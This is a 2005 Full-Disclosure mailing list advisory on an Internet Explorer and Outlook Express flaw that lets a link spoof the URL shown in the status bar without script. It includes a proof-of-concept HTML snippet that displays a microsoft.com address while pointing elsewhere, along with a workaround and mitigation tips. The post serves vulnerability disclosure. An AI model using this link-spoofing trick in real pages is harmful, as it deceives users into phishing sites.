[Full-Disclosure] IE/OE Restricted Zone Status Bar Spoofing

winter bitlance bitlance_3 at hotmail.com
Thu Feb 17 05:22:08 GMT 2005 

Hi LIST.

It is normally possible for script code to manipulate information displayed 
in the status bar in the Internet Zone. By default, Outlook Express 6 open 
HTML e-mail messages in the Restricted sites zone instead of the Internet 
Zone. Outlook Express users may especially trust information displayed in 
the status bar since HTML documents are viewed in context of the 
"Restricted" zone, which has scripting support disabled.

However, errors in Internet Explorer allows manipulation of the status bar 
without using any script code. This can be exploited by embedding a 
specially crafted form in a link.

http-equiv has discovered a weakness in Internet Explorer, which 
potentially can be exploited by malicious people to trick users into 
visiting a malicious website which facilitates a "phishing" attack. ( 
CAN-2004-1104 )

Now another weakness which use a "label for id trick" has been discovered. 
This weakness is a variant of CAN-2004-1104.

Example:
- -----8<----- -----8<----- -----8<----- -----8<-----

[!-- saved from url=(0007)http:// -->
[body style="color: WindowText; background-color: Window;">
[div>IE/OE Restricted Zone Status Bar Spoofing[/div>
[div>Tested on Windows XP with SP2 installed.[/div>
[p>[a id="SPOOF" href="http://www.example.com/?maliciouscontents">[/a>[/p>
[div>  
  [a href="http://www.microsoft.com/windows/default.mspx">
    [table>
      [caption>
        [a href="http://www.microsoft.com/windows/default.mspx ">
          [label for="SPOOF">
            [u style="cursor: pointer; color: blue">
              http://www.microsoft.com/windows/default.mspx
            [/u> 
          [/label>
        [/a>
      [/caption>
    [/table>
  [/a>
[/div>

- -----8<----- -----8<----- -----8<----- -----8<-----

workaround:( on Windows XP Service Pack 2 )

You can change the zone elevation setting under for each security zone by 
configuring the following option from Allow to Disabled or Prompt in the 
Custom Level Security dialog.
"Web sites in less privileged Web content zones can navigate into this 
zone"

http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/mangxpsp2/mngieps.mspx



Solution:
Never follow links from untrusted sources.

Read e-mail messages in plain text format if you are using Outlook Express 
6 SP1 or a later version , to help protect yourself from the HTML e-mail 
attack vector.

REGARDS.

-- 

bitlance winter

_________________________________________________________________
無料容量250MBでパワーアップ 「MSN Hotmail」 http://www.hotmail.com/

Full-Disclosure is hosted and sponsored by Secunia.